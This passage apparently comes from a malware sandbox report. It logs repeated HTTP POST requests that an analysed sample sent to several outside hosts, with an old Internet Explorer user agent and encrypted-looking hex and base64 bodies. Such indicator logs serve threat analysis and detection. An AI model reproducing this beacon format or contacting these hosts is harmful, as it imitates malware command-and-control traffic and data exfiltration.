              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 59 57 58 52 79 75 48 54 55 38 68 6f 4e 62 7a 6c 51 46 73 56 67 4c 72 6d 41 7a 66 66 65 67 66 72 70 66 6a 39 31 49 63 34 75 4f 77 66 6f 7a 45 69 44 2b 42 4e 6b 48 74 54 65 65 56 58 6b 52 52 43 4d 45 79 4f 50 34 71 41 32 38 72 70 2f 77 46 38 65 56 4b 58 53 79 48 4c 33 38 32 54 36 35 57 4b 55 64 52 5a 61 5a 45 34 41 2f 50 62 59 39 50 6a 2f 4a 6e 77 53 68 44 77 51 6b 30 2b 4e 53 63 50 77 45 75 79 50 6d 62 56 74 77 65 56 42 7a 66 30 43 51 7a 42 6f 79 31 39 72 34 63 54 43 67 74 53 6f 70 59 73 69 6a 75 66 5a 56 58 77 49 58 37 44 38 66 33 6c 66 59 69 65 31 49 4a 74 70 71 2f 63 77 68 6d 6a 37 75 79 68 6e 5a 71 72 62 50 63 64 34 30 35 71 4e 79 6d 31 2b 2f 6b 62 34 62 77 46 54 7a 5a 38 34 6b 31 46 49 2f 44 37 79 71 2f 4c 6c 67 47 49 75 6b 57 77 43 58 4f 39 6c 77 30 50 73 45 36 61 33 55 62 34 67 6a 6b 42 64 45 6b 2f 47 4d 4a 2f 62 74 46 4a 42 76 59 2f 51 41 2f 44 69 4e 56 6a 72 37 57 57 57 4a 2b 52 4a 32 6d 39 4d 42 53 67 31 77 72 70 47 31 4e 32 6b 4f 6a 61 62 30 43 46 51 68 73 43 4d 51 41 67 75 46 4d 41 55 34 58 2f 49 68 77 56 79 39 35 53 4b 45 73 37 30 70 38 6b 72 75 44 35 58 77 73 2f 63 65 6b 74 48 4f 7a 52 35 51 74 51 63 68 4e 50 62 4e 64 4a 6c 52 61 32 57 78 54 6f 70 77 6d 47 56 61 42 56 34 58 4e 4b 35 43 62 39 4f 57 62 4f 6b 38 57 6d 55 73 42 31 6d 69 59 4c 44 43 37 2b 44 37 77 77 52 42 37 71 6b 56 43 55 4d 78 36 2f 31 31 75 55 35 58 62 47 4d 64 31 75 78 38 36 49 45 61 2b 71 49 43 42 6e 52 65 58 68 69 61 35 55 7a 47 7a 2f 5a 55 2f 31 6c 45 73 4e 46 7a 58 71 30 72 56 31 78 57 49 55 74 54 4a 39 30 61 77 4b 63 58 43 52 39 78 55 6a 31 35 78 4d 66 30 70 66 70 6a 6e 61 43 36 71 36 6c 49 58 39 37 4e 30 43 43 65 56 46 6f 50 46 47 73 51 6c 74 59 4f 77 77 74 6b 77 63 70 51 3d 3d Data Ascii: YWXRyuHTU8hoNbzlQFsVgLrmAzffegfrpfj91Ic4uOwfozEiD+BNkHtTeeVXkRRCMEyOP4qA28rp/wF8eVKXSyHL382T65WKUdRZaZE4A/PbY9Pj/JnwShDwQk0+NScPwEuyPmbVtweVBzf0CQzBoy19r4cTCgtSopYsijufZVXwIX7D8f3lfYie1IJtpq/cwhmj7uyhnZqrbPcd405qNym1+/kb4bwFTzZ84k1FI/D7yq/LlgGIukWwCXO9lw0PsE6a3Ub4gjkBdEk/GMJ/btFJBvY/QA/DiNVjr7WWWJ+RJ2m9MBSg1wrpG1N2kOjab0CFQhsCMQAguFMAU4X/IhwVy95SKEs70p8kruD5Xws/cektHOzR5QtQchNPbNdJlRa2WxTopwmGVaBV4XNK5Cb9OWbOk8WmUsB1miYLDC7+D7wwRB7qkVCUMx6/11uU5XbGMd1ux86IEa+qICBnReXhia5UzGz/ZU/1lEsNFzXq0rV1xWIUtTJ90awKcXCR9xUj15xMf0pfpjnaC6q6lIX97N0CCeVFoPFGsQltYOwwtkwcpQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 69 77 4d 31 6d 4f 48 65 53 63 69 57 53 4c 69 48 51 4f 72 31 6d 72 6f 6c 5a 51 54 66 45 61 6d 6b 70 54 4e 47 42 73 50 52 63 6b 5a 6f 2b 4a 71 6c 4f 30 53 31 67 7a 4f 4e 4c 4f 79 34 35 43 32 61 43 68 69 44 42 7a 31 63 42 75 33 50 66 53 6c 65 63 79 32 51 56 6d 39 79 4e 6a 56 43 39 4c 45 45 45 57 6c 6f 4a 32 67 75 5a 70 68 37 4f 36 4b 66 47 6e 68 65 64 6a 32 32 74 56 50 31 63 73 43 39 31 55 4d 30 69 6a 68 51 4c 51 63 32 4a 78 47 64 78 76 2b 6f 6f 56 41 39 55 36 39 75 70 30 52 57 71 69 58 4a 6f 2f 49 41 4e 44 43 36 5a 7a 55 62 66 2b 64 4a 58 74 56 63 58 46 37 6e 51 58 39 50 62 53 46 56 6f 75 38 62 6a 43 6e 49 38 41 69 75 38 6a 51 33 77 4a 65 6c 72 75 4f 51 54 63 68 47 4f 63 78 4a 5a 68 52 64 56 51 42 6d 42 57 6b 7a 4d 57 6a 52 70 72 51 78 79 46 33 65 4a 55 76 49 45 71 7a 79 6d 4a 4c 36 63 34 37 34 47 79 75 76 66 4d 47 4f 5a 68 6d 74 34 55 32 74 45 70 6d 38 43 64 79 35 4f 72 6d 65 57 51 4d 59 46 53 65 43 6c 68 6f 79 77 5a 6e 4e 4e 52 4a 6c 4e 65 31 7a 33 38 6a 58 71 59 4a 4d 34 35 59 4b 36 75 61 65 48 35 68 33 6b 6d 4a 57 36 79 59 75 42 4b 6f 54 54 52 65 62 61 49 68 61 38 50 30 74 32 6d 73 39 4d 77 6d 6e 56 35 59 6e 32 7a 57 61 5a 6f 42 50 4a 68 42 6e 62 4b 66 51 32 47 76 45 74 4a 63 43 36 64 67 72 76 58 79 30 54 38 6e 33 70 30 30 59 35 59 69 31 4c 64 47 53 68 51 62 58 32 4c 6c 37 38 37 4b 72 44 56 4e 43 6f 6d 47 31 6e 59 75 67 6d 54 35 6c 69 53 57 45 69 39 46 2f 4c 4a 52 4d 4c 4f 34 51 42 59 4e 54 61 46 4d 4c 78 61 31 51 63 45 54 7a 6a 32 75 79 70 55 79 69 70 6f 69 5a 49 49 38 49 4c 31 4e 34 45 31 47 34 4b 52 76 7a 51 35 41 54 63 65 74 36 4e 74 4a 32 79 61 58 33 69 77 74 66 70 54 30 6c 48 72 55 3d Data Ascii: iwM1mOHeSciWSLiHQOr1mrolZQTfEamkpTNGBsPRckZo+JqlO0S1gzONLOy45C2aChiDBz1cBu3PfSlecy2QVm9yNjVC9LEEEWloJ2guZph7O6KfGnhedj22tVP1csC91UM0ijhQLQc2JxGdxv+ooVA9U69up0RWqiXJo/IANDC6ZzUbf+dJXtVcXF7nQX9PbSFVou8bjCnI8Aiu8jQ3wJelruOQTchGOcxJZhRdVQBmBWkzMWjRprQxyF3eJUvIEqzymJL6c474GyuvfMGOZhmt4U2tEpm8Cdy5OrmeWQMYFSeClhoywZnNNRJlNe1z38jXqYJM45YK6uaeH5h3kmJW6yYuBKoTTRebaIha8P0t2ms9MwmnV5Yn2zWaZoBPJhBnbKfQ2GvEtJcC6dgrvXy0T8n3p00Y5Yi1LdGShQbX2Ll787KrDVNComG1nYugmT5liSWEi9F/LJRMLO4QBYNTaFMLxa1QcETzj2uypUyipoiZII8IL1N4E1G4KRvzQ5ATcet6NtJ2yaX3iwtfpT0lHrU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 74 41 48 46 79 6e 7a 54 55 38 69 30 68 4c 57 55 4a 78 67 51 64 67 39 55 78 77 30 55 6a 6a 58 44 63 4b 54 6c 46 37 75 45 54 56 38 61 6d 38 76 6d 4e 56 70 59 6d 43 42 2f 58 7a 4d 58 54 4c 4d 69 30 69 47 6e 79 38 39 78 46 63 55 36 4e 58 33 7a 64 51 79 61 73 42 66 57 2f 7a 2b 77 35 4c 72 6f 73 32 77 64 65 73 75 6b 79 46 73 50 74 44 6a 64 47 52 6d 58 6d 48 6f 70 47 30 5a 31 52 47 4a 66 65 6b 37 75 42 53 77 59 47 46 77 62 52 63 52 6f 62 2b 66 6d 79 70 39 35 61 5a 71 52 78 6f 77 71 68 6c 58 34 31 43 6f 41 2b 50 30 4c 57 79 62 6e 77 39 68 44 6e 77 46 34 44 44 7a 71 58 35 45 6d 65 38 4e 63 67 4b 76 61 56 4b 33 65 73 72 4a 37 44 6c 31 2f 79 6e 69 62 30 50 35 72 74 4a 49 6b 64 6a 66 4e 4e 51 66 59 79 67 56 43 4b 6f 46 67 2b 42 45 2f 51 49 62 31 37 4f 45 43 36 70 30 4d 4a 47 77 63 65 43 33 74 43 33 53 36 6b 69 38 4c 53 6b 57 57 2f 51 48 4b 64 54 77 47 30 74 31 37 6c 4b 54 63 42 6a 64 76 52 2b 59 69 48 34 64 72 45 71 77 4f 72 6d 35 77 34 67 55 47 6e 70 44 56 52 54 4c 41 76 76 2f 72 6d 38 59 69 47 54 36 4a 65 78 63 71 4d 52 54 68 36 57 71 48 59 69 36 71 67 4e 6a 48 6c 4c 66 45 68 38 6d 53 57 38 6a 39 6f 44 41 38 4f 5a 4b 68 4c 74 42 53 65 6a 4c 46 33 33 45 49 4a 4e 4d 7a 6a 2b 64 6f 78 46 55 70 4c 6a 69 4b 75 69 6d 4c 64 58 5a 72 53 66 31 70 6b 56 71 31 35 4a 72 2f 58 6f 57 35 46 63 50 66 47 5a 76 55 49 34 6d 4b 42 6f 58 6d 6b 62 4e 75 76 2f 75 4b 4b 4d 53 50 77 44 67 47 49 58 62 54 4b 33 73 36 74 35 51 4a 70 59 31 4c 44 72 42 65 2f 71 68 49 51 65 4c 52 49 76 30 46 70 35 39 6c 6e 75 36 56 64 55 44 50 41 41 6b 4e 72 6c 4c 71 70 76 68 45 61 53 52 59 63 57 38 7a 59 5a 6d 38 45 30 34 6d 52 6d 37 31 45 53 5a 73 30 4e 38 6b 59 32 78 63 78 32 74 37 58 36 30 78 51 47 52 77 68 41 3d 3d Data Ascii: tAHFynzTU8i0hLWUJxgQdg9Uxw0UjjXDcKTlF7uETV8am8vmNVpYmCB/XzMXTLMi0iGny89xFcU6NX3zdQyasBfW/z+w5Lros2wdesukyFsPtDjdGRmXmHopG0Z1RGJfek7uBSwYGFwbRcRob+fmyp95aZqRxowqhlX41CoA+P0LWybnw9hDnwF4DDzqX5Eme8NcgKvaVK3esrJ7Dl1/ynib0P5rtJIkdjfNNQfYygVCKoFg+BE/QIb17OEC6p0MJGwceC3tC3S6ki8LSkWW/QHKdTwG0t17lKTcBjdvR+YiH4drEqwOrm5w4gUGnpDVRTLAvv/rm8YiGT6JexcqMRTh6WqHYi6qgNjHlLfEh8mSW8j9oDA8OZKhLtBSejLF33EIJNMzj+doxFUpLjiKuimLdXZrSf1pkVq15Jr/XoW5FcPfGZvUI4mKBoXmkbNuv/uKKMSPwDgGIXbTK3s6t5QJpY1LDrBe/qhIQeLRIv0Fp59lnu6VdUDPAAkNrlLqpvhEaSRYcW8zYZm8E04mRm71ESZs0N8kY2xcx2t7X60xQGRwhA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 69 77 4d 31 6d 4f 48 65 53 63 69 57 53 4c 69 48 51 4f 72 31 6d 72 6f 6c 5a 51 54 66 45 61 6d 6b 70 54 4e 47 42 73 50 52 63 6b 5a 6f 2b 4a 71 6c 4f 30 53 31 67 7a 4f 4e 4c 4f 79 34 35 43 32 61 43 68 69 44 42 7a 31 63 42 75 33 50 66 53 6c 65 63 79 32 51 56 6d 39 79 4e 6a 56 43 39 4c 45 45 45 57 6c 6f 4a 32 67 75 5a 70 68 37 4f 36 4b 66 47 6e 68 65 64 6a 32 32 74 56 50 31 63 73 43 39 31 55 4d 30 69 6a 68 51 4c 51 63 32 4a 78 47 64 78 76 2b 6f 6f 56 41 39 55 36 39 75 70 30 52 57 71 69 58 4a 6f 2f 49 41 4e 44 43 36 5a 7a 55 62 66 2b 64 4a 58 74 56 63 58 46 37 6e 51 58 39 50 62 53 46 56 6f 75 38 62 6a 43 6e 49 38 41 69 75 38 6a 51 33 77 4a 65 6c 72 75 4f 51 54 63 68 47 4f 63 78 4a 5a 68 52 64 56 51 42 6d 42 57 6b 7a 4d 57 6a 52 70 72 51 78 79 46 33 65 4a 55 76 49 45 71 7a 79 6d 4a 4c 36 63 34 37 34 47 79 75 76 66 4d 47 4f 5a 68 6d 74 34 55 32 74 45 70 6d 38 43 64 79 35 4f 72 6d 65 57 51 4d 59 46 53 65 43 6c 68 6f 79 77 5a 6e 4e 4e 52 4a 6c 4e 65 31 7a 33 38 6a 58 71 59 4a 4d 34 35 59 4b 36 75 61 65 48 35 68 33 6b 6d 4a 57 36 79 59 75 42 4b 6f 54 54 52 65 62 61 49 68 61 38 50 30 74 32 6d 73 39 4d 77 6d 6e 56 35 59 6e 32 7a 57 61 5a 6f 42 50 4a 68 42 6e 62 4b 66 51 32 47 76 45 74 4a 63 43 36 64 67 72 76 58 79 30 54 38 6e 33 70 30 30 59 35 59 69 31 4c 64 47 53 68 51 62 58 32 4c 6c 37 38 37 4b 72 44 56 4e 43 6f 6d 47 31 6e 59 75 67 6d 54 35 6c 69 53 57 45 69 39 46 2f 4c 4a 52 4d 4c 4f 34 51 42 59 4e 54 61 46 4d 4c 78 61 31 51 63 45 54 7a 6a 32 75 79 70 55 79 69 70 6f 69 5a 49 49 38 49 4c 31 4e 34 45 31 47 34 4b 52 76 7a 51 35 41 54 63 65 74 36 4e 74 4a 32 79 61 58 33 69 77 74 66 70 54 30 6c 48 72 55 3d Data Ascii: iwM1mOHeSciWSLiHQOr1mrolZQTfEamkpTNGBsPRckZo+JqlO0S1gzONLOy45C2aChiDBz1cBu3PfSlecy2QVm9yNjVC9LEEEWloJ2guZph7O6KfGnhedj22tVP1csC91UM0ijhQLQc2JxGdxv+ooVA9U69up0RWqiXJo/IANDC6ZzUbf+dJXtVcXF7nQX9PbSFVou8bjCnI8Aiu8jQ3wJelruOQTchGOcxJZhRdVQBmBWkzMWjRprQxyF3eJUvIEqzymJL6c474GyuvfMGOZhmt4U2tEpm8Cdy5OrmeWQMYFSeClhoywZnNNRJlNe1z38jXqYJM45YK6uaeH5h3kmJW6yYuBKoTTRebaIha8P0t2ms9MwmnV5Yn2zWaZoBPJhBnbKfQ2GvEtJcC6dgrvXy0T8n3p00Y5Yi1LdGShQbX2Ll787KrDVNComG1nYugmT5liSWEi9F/LJRMLO4QBYNTaFMLxa1QcETzj2uypUyipoiZII8IL1N4E1G4KRvzQ5ATcet6NtJ2yaX3iwtfpT0lHrU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4f 63 48 68 79 6d 6e 55 55 38 68 34 6f 56 6b 46 4f 4a 4b 54 6a 59 49 63 39 59 77 48 32 74 51 4a 72 63 58 41 33 56 4d 73 54 79 31 43 54 6c 77 6d 43 2b 43 63 56 36 31 70 76 55 41 58 4b 56 31 34 31 62 42 4b 77 49 4a 42 6d 56 72 57 76 76 69 6e 78 70 4d 48 75 6c 37 4c 6d 61 71 33 44 73 69 4e 4d 34 35 35 76 38 6f 5a 36 35 68 55 75 6a 4c 52 4b 62 38 35 6c 62 5a 6d 44 58 6a 45 4d 63 53 45 46 63 4c 41 52 2b 30 5a 44 54 53 6b 30 6e 6c 6f 78 79 35 43 77 75 6f 6e 47 78 55 73 61 50 53 55 79 39 6f 38 6c 52 49 4a 63 6e 6e 66 75 55 42 7a 30 47 31 74 61 4c 4b 4d 61 68 65 51 67 75 37 4a 38 5a 57 2b 4d 6f 5a 73 7a 46 6f 45 71 73 4b 6d 64 67 77 54 35 72 39 78 35 4a 61 70 6e 6b 6c 69 68 77 76 67 55 4d 66 6c 59 4a 4a 4a 52 32 4c 4f 4b 63 52 4d 69 70 34 33 50 56 63 4e 4d 6b 79 77 2f 4f 33 76 32 54 63 4e 36 75 47 76 33 5a 76 66 56 38 48 49 66 77 39 59 75 32 56 5a 2b 57 77 36 30 76 34 59 61 47 35 4b 47 53 31 73 6f 2b 78 2f 57 78 65 78 67 43 69 65 67 48 41 78 4b 72 4a 67 35 36 75 55 78 35 4a 79 54 4e 79 75 64 65 31 78 75 71 56 75 72 2b 56 51 63 58 66 57 6d 68 56 53 68 2b 45 2f 65 79 4e 2f 4d 49 75 6d 47 4e 78 4d 4e 6d 38 53 78 41 56 7a 78 4d 36 69 2b 53 50 30 79 46 56 6f 66 77 46 46 6b 76 65 34 48 55 39 62 4d 48 43 2b 63 64 4b 43 30 2b 6b 68 32 4f 75 73 55 37 36 71 34 65 36 4f 79 54 37 4a 54 75 50 35 34 54 76 64 57 57 58 66 35 6d 4e 76 53 76 62 56 67 61 56 64 50 66 6d 78 72 6e 79 6b 64 50 6c 49 6c 32 5a 7a 77 50 36 66 6a 63 68 47 49 61 56 34 78 39 70 74 6b 79 4a 36 50 5a 78 77 6f 56 33 66 49 32 58 76 61 79 76 57 6c 6c 77 62 69 79 62 4b 51 56 63 44 58 4c 4f 39 64 42 4b 36 6f 55 6f 2f 78 6a 57 59 63 6a 50 49 56 36 48 49 5a 31 70 58 74 53 74 69 75 32 57 4a 2f 31 68 50 63 6a 32 71 59 67 48 63 7a 41 38 3d Data Ascii: OcHhymnUU8h4oVkFOJKTjYIc9YwH2tQJrcXA3VMsTy1CTlwmC+CcV61pvUAXKV141bBKwIJBmVrWvvinxpMHul7Lmaq3DsiNM455v8oZ65hUujLRKb85lbZmDXjEMcSEFcLAR+0ZDTSk0nloxy5CwuonGxUsaPSUy9o8lRIJcnnfuUBz0G1taLKMaheQgu7J8ZW+MoZszFoEqsKmdgwT5r9x5JapnklihwvgUMflYJJJR2LOKcRMip43PVcNMkyw/O3v2TcN6uGv3ZvfV8HIfw9Yu2VZ+Ww60v4YaG5KGS1so+x/WxexgCiegHAxKrJg56uUx5JyTNyude1xuqVur+VQcXfWmhVSh+E/eyN/MIumGNxMNm8SxAVzxM6i+SP0yFVofwFFkve4HU9bMHC+cdKC0+kh2OusU76q4e6OyT7JTuP54TvdWWXf5mNvSvbVgaVdPfmxrnykdPlIl2ZzwP6fjchGIaV4x9ptkyJ6PZxwoV3fI2XvayvWllwbiybKQVcDXLO9dBK6oUo/xjWYcjPIV6HIZ1pXtStiu2WJ/1hPcj2qYgHczA8=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6d 61 70 2f 56 63 56 55 57 4d 69 65 66 54 44 54 37 4c 2f 75 34 54 37 70 4c 6f 61 54 6c 37 4b 33 79 62 32 63 31 35 36 42 2f 56 53 4c 44 59 37 77 59 72 52 6c 77 2b 42 45 55 4b 77 68 4d 4e 2b 56 52 58 50 57 63 41 76 56 4b 4b 6b 53 39 44 2b 4c 32 32 70 63 62 46 52 39 46 4b 66 6e 38 58 49 65 7a 78 45 34 64 63 68 67 30 7a 5a 6b 74 51 35 5a 37 30 4f 57 78 30 49 2b 38 37 39 55 74 72 46 75 4f 33 6e 78 36 6b 7a 75 71 71 65 65 76 56 4a 55 6b 68 57 55 79 33 6f 6c 43 47 79 76 31 5a 74 36 2f 59 4f 5a 39 70 51 70 4d 73 70 38 68 47 75 53 38 53 43 63 4b 66 45 33 79 31 64 33 58 30 42 62 79 4c 46 63 41 4a 33 41 45 6c 76 69 6b 45 49 6a 77 45 45 70 52 53 48 79 4f 72 41 4b 47 74 4e 75 75 6b 4c 58 31 6a 33 66 4f 5a 5a 32 39 48 36 55 4d 71 47 79 52 6c 33 4b 35 50 44 73 42 59 32 71 5a 51 38 56 71 34 79 51 61 37 68 67 54 73 57 5a 62 39 73 57 48 34 72 6d 77 42 58 48 58 53 59 77 33 65 6e 30 6f 59 43 41 58 6c 4e 79 6b 67 31 37 7a 61 79 57 2f 4b 73 32 41 69 6d 41 5a 41 68 30 4e 68 70 5a 57 44 49 33 4a 67 47 34 43 6d 78 65 50 4a 44 57 4b 41 4f 2b 5a 61 34 6f 52 75 61 52 66 67 37 52 4a 55 77 2f 46 4a 48 52 6e 36 35 46 73 59 4a 58 78 47 62 42 4d 4e 65 4a 7a 6b 6d 41 73 67 2f 65 6b 6f 43 30 5a 6c 50 4d 38 51 4c 67 79 63 58 33 33 52 4d 2f 6a 6a 37 68 43 43 64 42 61 70 2b 6c 74 47 43 61 48 36 63 44 4f 79 4a 4e 79 4a 5a 45 2b 43 47 33 31 71 56 36 72 6c 52 37 46 76 74 51 4c 36 62 57 4c 5a 36 62 6e 65 4b 76 2f 35 55 71 69 6f 4f 45 32 76 69 52 4b 66 7a 42 70 68 68 50 4b 42 34 5a 67 55 58 44 2b 4c 4b 55 64 43 2b 53 70 6e 4c 44 38 6a 78 54 50 68 59 30 68 7a 63 4d 79 66 54 34 39 77 4c 61 43 51 3d 3d Data Ascii: map/VcVUWMiefTDT7L/u4T7pLoaTl7K3yb2c156B/VSLDY7wYrRlw+BEUKwhMN+VRXPWcAvVKKkS9D+L22pcbFR9FKfn8XIezxE4dchg0zZktQ5Z70OWx0I+879UtrFuO3nx6kzuqqeevVJUkhWUy3olCGyv1Zt6/YOZ9pQpMsp8hGuS8SCcKfE3y1d3X0BbyLFcAJ3AElvikEIjwEEpRSHyOrAKGtNuukLX1j3fOZZ29H6UMqGyRl3K5PDsBY2qZQ8Vq4yQa7hgTsWZb9sWH4rmwBXHXSYw3en0oYCAXlNykg17zayW/Ks2AimAZAh0NhpZWDI3JgG4CmxePJDWKAO+Za4oRuaRfg7RJUw/FJHRn65FsYJXxGbBMNeJzkmAsg/ekoC0ZlPM8QLgycX33RM/jj7hCCdBap+ltGCaH6cDOyJNyJZE+CG31qV6rlR7FvtQL6bWLZ6bneKv/5UqioOE2viRKfzBphhPKB4ZgUXD+LKUdC+SpnLD8jxTPhY0hzcMyfT49wLaCQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6d 61 70 2f 56 63 56 55 57 4d 69 65 66 54 44 54 37 4c 2f 75 34 54 37 70 4c 6f 61 54 6c 37 4b 33 79 62 32 63 31 35 36 42 2f 56 53 4c 44 59 37 77 59 72 52 6c 77 2b 42 45 55 4b 77 68 4d 4e 2b 56 52 58 50 57 63 41 76 56 4b 4b 6b 53 39 44 2b 4c 32 32 70 63 62 46 52 39 46 4b 66 6e 38 58 49 65 7a 78 45 34 64 63 68 67 30 7a 5a 6b 74 51 35 5a 37 30 4f 57 78 30 49 2b 38 37 39 55 74 72 46 75 4f 33 6e 78 36 6b 7a 75 71 71 65 65 76 56 4a 55 6b 68 57 55 79 33 6f 6c 43 47 79 76 31 5a 74 36 2f 59 4f 5a 39 70 51 70 4d 73 70 38 68 47 75 53 38 53 43 63 4b 66 45 33 79 31 64 33 58 30 42 62 79 4c 46 63 41 4a 33 41 45 6c 76 69 6b 45 49 6a 77 45 45 70 52 53 48 79 4f 72 41 4b 47 74 4e 75 75 6b 4c 58 31 6a 33 66 4f 5a 5a 32 39 48 36 55 4d 71 47 79 52 6c 33 4b 35 50 44 73 42 59 32 71 5a 51 38 56 71 34 79 51 61 37 68 67 54 73 57 5a 62 39 73 57 48 34 72 6d 77 42 58 48 58 53 59 77 33 65 6e 30 6f 59 43 41 58 6c 4e 79 6b 67 31 37 7a 61 79 57 2f 4b 73 32 41 69 6d 41 5a 41 68 30 4e 68 70 5a 57 44 49 33 4a 67 47 34 43 6d 78 65 50 4a 44 57 4b 41 4f 2b 5a 61 34 6f 52 75 61 52 66 67 37 52 4a 55 77 2f 46 4a 48 52 6e 36 35 46 73 59 4a 58 78 47 62 42 4d 4e 65 4a 7a 6b 6d 41 73 67 2f 65 6b 6f 43 30 5a 6c 50 4d 38 51 4c 67 79 63 58 33 33 52 4d 2f 6a 6a 37 68 43 43 64 42 61 70 2b 6c 74 47 43 61 48 36 63 44 4f 79 4a 4e 79 4a 5a 45 2b 43 47 33 31 71 56 36 72 6c 52 37 46 76 74 51 4c 36 62 57 4c 5a 36 62 6e 65 4b 76 2f 35 55 71 69 6f 4f 45 32 76 69 52 4b 66 7a 42 70 68 68 50 4b 42 34 5a 67 55 58 44 2b 4c 4b 55 64 43 2b 53 70 6e 4c 44 38 6a 78 54 50 68 59 30 68 7a 63 4d 79 66 54 34 39 77 4c 61 43 51 3d 3d Data Ascii: map/VcVUWMiefTDT7L/u4T7pLoaTl7K3yb2c156B/VSLDY7wYrRlw+BEUKwhMN+VRXPWcAvVKKkS9D+L22pcbFR9FKfn8XIezxE4dchg0zZktQ5Z70OWx0I+879UtrFuO3nx6kzuqqeevVJUkhWUy3olCGyv1Zt6/YOZ9pQpMsp8hGuS8SCcKfE3y1d3X0BbyLFcAJ3AElvikEIjwEEpRSHyOrAKGtNuukLX1j3fOZZ29H6UMqGyRl3K5PDsBY2qZQ8Vq4yQa7hgTsWZb9sWH4rmwBXHXSYw3en0oYCAXlNykg17zayW/Ks2AimAZAh0NhpZWDI3JgG4CmxePJDWKAO+Za4oRuaRfg7RJUw/FJHRn65FsYJXxGbBMNeJzkmAsg/ekoC0ZlPM8QLgycX33RM/jj7hCCdBap+ltGCaH6cDOyJNyJZE+CG31qV6rlR7FvtQL6bWLZ6bneKv/5UqioOE2viRKfzBphhPKB4ZgUXD+LKUdC+SpnLD8jxTPhY0hzcMyfT49wLaCQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4f 63 48 68 79 6d 6e 55 55 38 68 34 6f 56 6b 46 4f 4a 4b 54 6a 59 49 63 39 59 77 48 32 74 51 4a 72 63 58 41 33 56 4d 73 54 79 31 43 54 6c 77 6d 43 2b 43 63 56 36 31 70 76 55 41 58 4b 56 31 34 31 62 42 4b 77 49 4a 42 6d 56 72 57 76 76 69 6e 78 70 4d 48 75 6c 37 4c 6d 61 71 33 44 73 69 4e 4d 34 35 35 76 38 6f 5a 36 35 68 55 75 6a 4c 52 4b 62 38 35 6c 62 5a 6d 44 58 6a 45 4d 63 53 45 46 63 4c 41 52 2b 30 5a 44 54 53 6b 30 6e 6c 6f 78 79 35 43 77 75 6f 6e 47 78 55 73 61 50 53 55 79 39 6f 38 6c 52 49 4a 63 6e 6e 66 75 55 42 7a 30 47 31 74 61 4c 4b 4d 61 68 65 51 67 75 37 4a 38 5a 57 2b 4d 6f 5a 73 7a 46 6f 45 71 73 4b 6d 64 67 77 54 35 72 39 78 35 4a 61 70 6e 6b 6c 69 68 77 76 67 55 4d 66 6c 59 4a 4a 4a 52 32 4c 4f 4b 63 52 4d 69 70 34 33 50 56 63 4e 4d 6b 79 77 2f 4f 33 76 32 54 63 4e 36 75 47 76 33 5a 76 66 56 38 48 49 66 77 39 59 75 32 56 5a 2b 57 77 36 30 76 34 59 61 47 35 4b 47 53 31 73 6f 2b 78 2f 57 78 65 78 67 43 69 65 67 48 41 78 4b 72 4a 67 35 36 75 55 78 35 4a 79 54 4e 79 75 64 65 31 78 75 71 56 75 72 2b 56 51 63 58 66 57 6d 68 56 53 68 2b 45 2f 65 79 4e 2f 4d 49 75 6d 47 4e 78 4d 4e 6d 38 53 78 41 56 7a 78 4d 36 69 2b 53 50 30 79 46 56 6f 66 77 46 46 6b 76 65 34 48 55 39 62 4d 48 43 2b 63 64 4b 43 30 2b 6b 68 32 4f 75 73 55 37 36 71 34 65 36 4f 79 54 37 4a 54 75 50 35 34 54 76 64 57 57 58 66 35 6d 4e 76 53 76 62 56 67 61 56 64 50 66 6d 78 72 6e 79 6b 64 50 6c 49 6c 32 5a 7a 77 50 36 66 6a 63 68 47 49 61 56 34 78 39 70 74 6b 79 4a 36 50 5a 78 77 6f 56 33 66 49 32 58 76 61 79 76 57 6c 6c 77 62 69 79 62 4b 51 56 63 44 58 4c 4f 39 64 42 4b 36 6f 55 6f 2f 78 6a 57 59 63 6a 50 49 56 36 48 49 5a 31 70 58 74 53 74 69 75 32 57 4a 2f 31 68 50 63 6a 32 71 59 67 48 63 7a 41 38 3d Data Ascii: 